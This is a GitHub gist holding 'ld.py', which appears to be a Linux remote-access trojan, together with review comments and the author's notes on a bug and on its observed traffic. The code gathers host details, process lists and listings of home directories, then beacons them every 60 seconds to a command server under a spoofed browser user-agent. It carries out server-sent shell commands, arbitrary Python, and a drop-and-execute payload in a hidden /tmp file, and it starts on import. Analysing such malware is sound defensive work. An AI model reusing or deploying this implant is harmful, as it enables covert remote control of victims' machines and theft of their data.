Created
March 31, 2026 16:32
-
-
Save jrwren/78928fc5d36206167f32eb4bc489c5dc to your computer and use it in GitHub Desktop.
ld.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import string | |
| import secrets | |
| import os | |
| import pwd | |
| import platform | |
| import time | |
| import sys | |
| import subprocess | |
| import base64 | |
| import shlex | |
| from pathlib import Path | |
| import json | |
| from urllib.parse import urlsplit | |
| import datetime | |
| import http.client | |
| import sys | |
| def get_os(): | |
| # Return a coarse architecture label derived from platform.machine(). | |
| # Every return value carries a "linux_" prefix; no check of the actual | |
| # operating system is made in this function. | |
| arch = platform.machine().lower() | |
| if arch in ("x86_64", "amd64"): | |
| return "linux_x64" | |
| elif "arm" in arch or "aarch" in arch: | |
| return "linux_arm" | |
| else: | |
| return "linux_unknown" | |
| def get_boot_time(): | |
| # Estimate the boot time as "now minus uptime", where uptime is the first | |
| # field of /proc/uptime. Returns a naive datetime (no tzinfo attached). | |
| with open("/proc/uptime", "r") as f: | |
| uptime_seconds = float(f.readline().split()[0]) | |
| boot_time = datetime.datetime.now() - datetime.timedelta(seconds=uptime_seconds) | |
| return boot_time | |
| def get_host_name(): | |
| # Return the contents of /proc/sys/kernel/hostname with surrounding | |
| # whitespace stripped. No error handling: a missing file raises. | |
| with open("/proc/sys/kernel/hostname", "r") as f: | |
| return f.read().strip() | |
| def get_user_name(): | |
| # Return the login name reported by os.getlogin(). | |
| # NOTE(review): per the Python docs os.getlogin() depends on a controlling | |
| # terminal and can raise OSError without one; nothing here catches that. | |
| # Confirm how this behaves when launched detached or inside a container. | |
| return os.getlogin() | |
| def get_installation_time(): | |
| # Approximate the OS installation time from the ctime of | |
| # /var/log/installer, falling back to /var/log/dpkg.log. | |
| # Returns a datetime when one of the paths exists, otherwise the empty | |
| # string "" -- so the return type is not uniform. | |
| install_log_path = "/var/log/installer" | |
| dpkg_log_path = "/var/log/dpkg.log" | |
| if os.path.exists(install_log_path): | |
| install_time = os.path.getctime(install_log_path) | |
| elif os.path.exists(dpkg_log_path): | |
| install_time = os.path.getctime(dpkg_log_path) | |
| else: | |
| return "" | |
| return datetime.datetime.fromtimestamp(install_time) | |
| def get_system_info(): | |
| # Read the hardware vendor and product name from the DMI entries under | |
| # /sys/class/dmi/id. Returns (manufacturer, product_name); either value | |
| # stays "" when its file does not exist. Only FileNotFoundError is | |
| # handled -- other I/O errors propagate to the caller. | |
| manufacturer = "" | |
| product_name = "" | |
| try: | |
| with open("/sys/class/dmi/id/sys_vendor", "r") as f: | |
| manufacturer = f.read().strip() | |
| except FileNotFoundError: | |
| pass | |
| try: | |
| with open("/sys/class/dmi/id/product_name", "r") as f: | |
| product_name = f.read().strip() | |
| except FileNotFoundError: | |
| pass | |
| return manufacturer, product_name | |
| def get_process_list(): | |
| # Enumerate processes by walking the numeric entries of /proc. | |
| # Returns a list of (pid, ppid, username, start_time, cmdline) tuples; | |
| # the entry for this process has "*" prepended to its cmdline. | |
| # Any process whose files raise FileNotFoundError, IndexError or | |
| # ValueError is silently dropped from the result. | |
| process_list = [] | |
| current_pid = os.getpid() | |
| for pid in os.listdir("/proc"): | |
| if pid.isdigit(): | |
| try: | |
| cmdline_path = os.path.join("/proc", pid, "cmdline") | |
| if os.path.exists(cmdline_path): | |
| with open(cmdline_path, "r") as cmdline_file: | |
| # Arguments in /proc/<pid>/cmdline are NUL-separated; join them with spaces. | |
| cmdline = cmdline_file.read().replace("\x00", " ").strip() | |
| else: | |
| cmdline = "N/A" | |
| with open(os.path.join("/proc", pid, "stat"), "r") as stat_file: | |
| # NOTE(review): a plain whitespace split assumes the process name | |
| # field contains no spaces. When it does, the indexes below are | |
| # shifted; int() then presumably raises ValueError and the | |
| # process is skipped by the except clause at the bottom. | |
| stat_content = stat_file.read().split() | |
| ppid = int(stat_content[3]) | |
| start_time_ticks = int(stat_content[21]) | |
| # /proc/uptime is re-read for every process rather than once per call. | |
| with open("/proc/uptime", "r") as uptime_file: | |
| uptime_seconds = float(uptime_file.readline().split()[0]) | |
| system_boot_time = datetime.datetime.now() - datetime.timedelta( | |
| seconds=uptime_seconds | |
| ) | |
| # Start time = boot time + (start ticks / clock ticks per second). | |
| start_time = system_boot_time + datetime.timedelta( | |
| seconds=start_time_ticks | |
| / os.sysconf(os.sysconf_names["SC_CLK_TCK"]) | |
| ) | |
| with open(os.path.join("/proc", pid, "status"), "r") as status_file: | |
| for line in status_file: | |
| if line.startswith("Uid:"): | |
| uid = int(line.split()[1]) | |
| break | |
| # NOTE(review): indentation is lost in this capture; this "else" | |
| # presumably pairs with the "for" (no "Uid:" line found). | |
| else: | |
| uid = -1 | |
| username = "N/A" | |
| if uid != -1: | |
| # /etc/passwd is scanned linearly for every process; the pwd | |
| # module imported at file level is not used here. | |
| with open("/etc/passwd", "r") as passwd_file: | |
| for passwd_line in passwd_file: | |
| fields = passwd_line.strip().split(":") | |
| if int(fields[2]) == uid: | |
| username = fields[0] | |
| break | |
| if int(pid) == current_pid: | |
| process_list.append( | |
| (int(pid), ppid, username, start_time, "*" + cmdline) | |
| ) | |
| else: | |
| process_list.append((int(pid), ppid, username, start_time, cmdline)) | |
| except (FileNotFoundError, IndexError, ValueError): | |
| pass | |
| return process_list | |
| def print_process_list(): | |
| # Format the result of get_process_list() as a fixed-width text table and | |
| # RETURN it as a string; despite the name, nothing is printed. | |
| # Command lines longer than 60 characters are cut to 57 plus "...". | |
| process_list = get_process_list() | |
| # The local name "str" shadows the builtin str for the rest of this function. | |
| str = "" | |
| for pid, ppid, username, start_time, cmdline in process_list: | |
| if len(cmdline) > 60: | |
| cmdline = cmdline[:57] + "..." | |
| start_time_str = start_time.strftime("%Y-%m-%d %H:%M:%S") | |
| str += ( | |
| "{:<10} {:<10} {:<15} {:<25} {:<}".format( | |
| pid, ppid, username, start_time_str, cmdline | |
| ) | |
| + "\n" | |
| ) | |
| str += "\n" | |
| return str | |
| def generate_random_string(length): | |
| # Return a random string of `length` ASCII letters and digits, drawn with | |
| # secrets.choice. Used in this file for the client uid and for the name | |
| # of the file dropped in /tmp. | |
| characters = string.ascii_letters + string.digits | |
| return "".join(secrets.choice(characters) for _ in range(length)) | |
| def do_action_ijt(ijtbin, param): | |
| # SECURITY: drop-and-execute handler for the "peinject" command. | |
| # It base64-decodes a payload, writes it to a hidden, randomly named file | |
| # /tmp/.<6 chars>, makes it world-writable and executable (0o777), and | |
| # launches it with `param` as its arguments via subprocess.Popen. | |
| # Returns {"status": "Wow", "msg": ""} on success or | |
| # {"status": "Zzz", "msg": <error text>} when the try block fails. | |
| # NOTE(review): `b64_string` is not defined in this function or anywhere in | |
| # the visible source, and the `ijtbin` parameter is never read. The decode | |
| # line sits before the try block, so as captured a NameError would escape | |
| # to the caller. | |
| payload = base64.b64decode(b64_string) | |
| # Indicator for defenders: dot-prefixed 6-character file names directly under /tmp. | |
| file_path = f"/tmp/.{generate_random_string(6)}" | |
| try: | |
| with open(file_path, "wb") as file: | |
| file.write(payload) | |
| os.chmod(file_path, 0o777) | |
| # Popen is not waited on; the dropped file is never removed by this code. | |
| subprocess.Popen( | |
| [file_path] + shlex.split(param.decode("utf-8", errors="strict")) | |
| ) | |
| except Exception as e: | |
| return { | |
| "status": "Zzz", | |
| "msg": str(e) | |
| } | |
| return { | |
| "status": "Wow", | |
| "msg": "" | |
| } | |
| def get_filelist(PathStr, id, Recurse=False): | |
| # Build a directory listing for PathStr. | |
| # PathStr: path to list. id: opaque value echoed back in the result (the | |
| # parameter name shadows the builtin id). Recurse: when true, uses | |
| # rglob("*") instead of iterdir(). | |
| # Returns {"id", "parent", "childs"}, where "childs" is a list of dicts with | |
| # Name, IsDir, SizeBytes, Created, Modified and HasItems. | |
| # Raises Exception when PathStr does not exist. Errors from stat() or | |
| # iterdir() on individual entries are not caught here. | |
| p = Path(PathStr) | |
| if not p.exists(): | |
| raise Exception(f"No Exists Such Dir: {PathStr}") | |
| items = p.rglob("*") if Recurse else p.iterdir() | |
| result = [] | |
| for item in items: | |
| stat = item.stat() | |
| # st_birthtime is not present on every platform; "Created" falls back to 0. | |
| created_ts = getattr(stat, "st_birthtime", None) | |
| created = int(created_ts) if created_ts is not None else 0 | |
| modified = int(stat.st_mtime) | |
| hasItems = False | |
| if item.is_dir(): | |
| # True when the directory has at least one entry. | |
| hasItems = any(item.iterdir()) | |
| result.append({ | |
| "Name": item.name, | |
| "IsDir": item.is_dir(), | |
| "SizeBytes": 0 if item.is_dir() else stat.st_size, | |
| "Created": created, | |
| "Modified": modified, | |
| "HasItems": hasItems | |
| }) | |
| return { | |
| "id": id, | |
| "parent": str(p), | |
| "childs": result | |
| } | |
| def do_action_dir(Paths): | |
| # Handler for the "rundir" command: return one non-recursive | |
| # get_filelist() result per requested entry. | |
| # Each element of Paths is indexed with "path" and "id"; exceptions raised | |
| # by get_filelist are not caught here. | |
| rlt = [] | |
| for item in Paths: | |
| rlt.append(get_filelist(item["path"], item["id"])) | |
| return rlt | |
| def init_dir_info(): | |
| # Collect initial listings of the current user's home directory and its | |
| # .config, Documents and Desktop subdirectories, skipping any that do not | |
| # exist. Each listing is tagged with an id of the form "FirstReqPath-<idx>". | |
| # Returns the list of get_filelist() results. | |
| home_dir = Path.home() | |
| init_dir = [ | |
| home_dir, | |
| home_dir / ".config", | |
| home_dir / "Documents", | |
| home_dir / "Desktop", | |
| ] | |
| rlt = [] | |
| idx = 0 | |
| for item in init_dir: | |
| if item.exists(): | |
| rlt.append(get_filelist(str(item), "FirstReqPath-" + str(idx))) | |
| idx = idx + 1 | |
| return rlt | |
| def do_run_scpt(cmdline): | |
| # SECURITY: runs `cmdline` through the system shell (shell=True). In this | |
| # file the value comes from the server response, so this amounts to | |
| # remote command execution. | |
| # stderr is merged into stdout and the output is captured as text. | |
| # Returns {"status": "Wow", "msg": <output>} when the command ran (the exit | |
| # code is not checked), or {"status": "Zzz", "msg": <error text>} when | |
| # subprocess.run itself raised. | |
| try: | |
| result = subprocess.run( | |
| cmdline, | |
| shell=True, | |
| stdout=subprocess.PIPE, | |
| stderr=subprocess.STDOUT, | |
| text=True | |
| ) | |
| return { | |
| "status": "Wow", | |
| "msg": result.stdout | |
| } | |
| except Exception as e: | |
| return { | |
| "status": "Zzz", | |
| "msg": str(e) | |
| } | |
| def do_action_scpt(scpt, param): | |
| # SECURITY: handler for the "runscript" command; executes server-supplied code. | |
| # When `scpt` is falsy, `param` is run as a shell command via do_run_scpt. | |
| # Otherwise `scpt` is base64-decoded to UTF-8 Python source and executed | |
| # with `python3 -c`, with `param` shlex-split into extra arguments. | |
| # Returns the same {"status", "msg"} shape as do_run_scpt. | |
| if not scpt: | |
| return do_run_scpt(param) | |
| try: | |
| payload = base64.b64decode(scpt).decode("utf-8", errors="strict") | |
| result = subprocess.run( | |
| ["python3", "-c", payload] + shlex.split(param), | |
| stdout=subprocess.PIPE, | |
| stderr=subprocess.STDOUT, | |
| text=True | |
| ) | |
| return { | |
| "status": "Wow", | |
| "msg": result.stdout | |
| } | |
| except Exception as e: | |
| return { | |
| "status": "Zzz", | |
| "msg": str(e) | |
| } | |
| def send_post_request(full_url, data): | |
| # POST `data` to `full_url` using http.client and return the raw response | |
| # body as bytes, or None if anything at all raised. | |
| # HTTPS is used when the URL scheme is "https", plain HTTP otherwise; the | |
| # timeout is 60 seconds. The HTTP status code is not inspected. | |
| try: | |
| url_parts = urlsplit(full_url) | |
| host = url_parts.netloc | |
| path = url_parts.path or "/" | |
| if url_parts.query: | |
| path += "?" + url_parts.query | |
| if isinstance(data, str): | |
| data = data.encode("utf-8") | |
| if url_parts.scheme == "https": | |
| conn = http.client.HTTPSConnection(host, timeout=60) | |
| else: | |
| conn = http.client.HTTPConnection(host, timeout=60) | |
| # Indicator for defenders: fixed, lowercase legacy MSIE 8 User-Agent string. | |
| # The body is declared as form-urlencoded although send_result() passes | |
| # base64 text. | |
| headers = { | |
| "Content-Type": "application/x-www-form-urlencoded", | |
| "User-Agent": "mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)", | |
| } | |
| conn.request("POST", path, data, headers) | |
| response = conn.getresponse() | |
| response_data = response.read() | |
| # close() is only reached on the success path. | |
| conn.close() | |
| return response_data | |
| except Exception: | |
| return None | |
| def send_result(url, body): | |
| # Serialize `body` to JSON (non-ASCII kept as-is), encode it as UTF-8, | |
| # base64-encode the bytes and POST the resulting text to `url`. | |
| # Returns whatever send_post_request returns (response bytes or None). | |
| encoded = base64.b64encode( | |
| json.dumps(body, ensure_ascii=False).encode("utf-8") | |
| ).decode() | |
| return send_post_request(url, encoded) | |
| def process_request(url, uid, data) -> bool: | |
| # Command dispatcher: parse the server response `data` as JSON and act on | |
| # its "type" field, posting a "CmdResult" message back to `url`. | |
| #   "kill"      -> acknowledge, then terminate the process via sys.exit(0) | |
| #   "peinject"  -> do_action_ijt(IjtBin, Param) | |
| #   "runscript" -> do_action_scpt(Script, Param) | |
| #   "rundir"    -> do_action_dir(ReqPaths) | |
| # Any other type is ignored. Returns False for empty data, True otherwise. | |
| # json.loads and the handlers are not wrapped in try/except here, so a | |
| # malformed response or a handler exception propagates to the caller. | |
| if len(data) == 0: | |
| return False | |
| json_obj = json.loads(data) | |
| if json_obj.get("type") == "kill": | |
| body = { | |
| "type": "CmdResult", | |
| "cmd": "rsp_kill", | |
| "cmdid": json_obj.get("CmdID"), | |
| "uid": uid, | |
| "status": "success", | |
| } | |
| send_result(url, body) | |
| sys.exit(0) | |
| elif json_obj.get("type") == "peinject": | |
| rlt = do_action_ijt( | |
| json_obj.get("IjtBin"), | |
| json_obj.get("Param") | |
| ) | |
| body = { | |
| "type": "CmdResult", | |
| "cmd": "rsp_peinject", | |
| "cmdid": json_obj.get("CmdID"), | |
| "uid": uid, | |
| "status": rlt.get("status"), | |
| "msg": rlt.get("msg"), | |
| } | |
| send_result(url, body) | |
| elif json_obj.get("type") == "runscript": | |
| rlt = do_action_scpt( | |
| json_obj.get("Script"), | |
| json_obj.get("Param") | |
| ) | |
| body = { | |
| "type": "CmdResult", | |
| "cmd": "rsp_runscript", | |
| "cmdid": json_obj.get("CmdID"), | |
| "uid": uid, | |
| "status": rlt.get("status"), | |
| "msg": rlt.get("msg"), | |
| } | |
| send_result(url, body) | |
| elif json_obj.get("type") == "rundir": | |
| rlt = do_action_dir(json_obj.get("ReqPaths")) | |
| body = { | |
| "type": "CmdResult", | |
| "cmd": "rsp_rundir", | |
| "cmdid": json_obj.get("CmdID"), | |
| "status": "Wow", | |
| "uid": uid, | |
| "msg": rlt, | |
| } | |
| send_result(url, body) | |
| return True | |
| def main_work(url, uid): | |
| # Beacon loop: gather host details once, then repeatedly POST a "BaseInfo" | |
| # message (host details plus a fresh process table) to `url`, hand any | |
| # non-empty response to process_request, and sleep 60 seconds. | |
| # The loop has no break; it ends only through an uncaught exception or the | |
| # sys.exit(0) in process_request's "kill" branch. | |
| boot_time = str(get_boot_time()) | |
| installation_time = str(get_installation_time()) | |
| timezone = str(datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo) | |
| manufacturer, product_name = get_system_info() | |
| os_version = platform.system() + " " + platform.release() + " " | |
| # The local name "os" shadows the os module inside this function. | |
| os = get_os() | |
| while True: | |
| current_time = str(datetime.datetime.now()) | |
| ps = print_process_list() | |
| # Field naming as sent: "modelName" carries the DMI vendor and "cpuType" | |
| # carries the DMI product name. | |
| data = { | |
| "hostname": get_host_name(), | |
| "username": get_user_name(), | |
| "os": os, | |
| "version": os_version, | |
| "timezone": timezone, | |
| "installDate": installation_time, | |
| "bootTimeString": boot_time, | |
| "currentTimeString": current_time, | |
| "modelName": manufacturer, | |
| "cpuType": product_name, | |
| "processList": ps | |
| } | |
| body = { | |
| "type": "BaseInfo", | |
| "uid": uid, | |
| "data": data | |
| } | |
| response_content = send_result(url, body) | |
| if response_content: | |
| # The return value is stored but not used afterwards. | |
| result = process_request(url, uid, response_content) | |
| time.sleep(60) | |
| def work(): | |
| # Entry point: take the server URL from sys.argv[1], generate a random | |
| # 16-character client uid, send a "FirstInfo" message containing the | |
| # initial home-directory listings, then enter the main_work beacon loop. | |
| # A missing argv[1] raises IndexError; nothing here handles it. | |
| url = sys.argv[1] | |
| uid = generate_random_string(16) | |
| # The local name "os" shadows the os module inside this function. | |
| os = get_os() | |
| dir_info = init_dir_info() | |
| body = { | |
| "type": "FirstInfo", | |
| "uid": uid, | |
| "os": os, | |
| "content": dir_info | |
| } | |
| send_result(url, body) | |
| main_work(url, uid) | |
| # main_work loops forever, so this return is not reached in normal operation. | |
| return True | |
| # Runs unconditionally when the file is executed or imported; there is no | |
| # `if __name__ == "__main__":` guard. | |
| work() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| see below |
Author
Author
Interestingly, there is a bug in get_process_list in how it splits /proc/N/stat on whitespace. Process names in /proc/N/stat can contain whitespace, so, for example, "tmux server" and "tmux client" will not be reported in the list.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Posts base64 encoded payload like:
which, when I ran in a container decodes to:
Interestingly, processList is empty here, and I don't know why.
The first request posts this: